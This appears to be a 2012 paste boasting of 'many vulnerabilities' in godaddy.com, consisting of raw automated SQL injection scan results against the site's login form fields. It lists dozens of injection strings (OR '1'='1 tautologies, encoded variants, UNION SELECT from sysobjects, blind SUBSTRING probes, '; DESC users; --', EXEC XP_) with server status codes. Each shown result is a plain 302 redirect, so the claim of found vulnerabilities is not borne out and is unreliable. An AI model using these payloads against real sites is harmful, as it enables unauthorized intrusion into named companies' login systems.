http://www.godaddy.com/ many vulnerabilities found by: @A

By: a guest on Sep 11th, 2012  |  syntax: None  |  size: 4.58 KB  |  views: 7,858  |  expires: Never
http://www.godaddy.com/

many vulnerabilities found

by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r

SQL Injection String Tests Summary (43860 results recorded)
Failures: 51
Warnings: 0
Passes: 43809

SQL Injection String Test Results

loginname
Submitted Form State:

    password:
    validate: 1

Results:
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1

password
Submitted Form State:

    loginname:
    validate: 1

Results:
Server Status Code: 302 Found
Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1

validate
Submitted Form State:

    loginname:
    password:

Results:
Server Status Code: 302 Found
Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1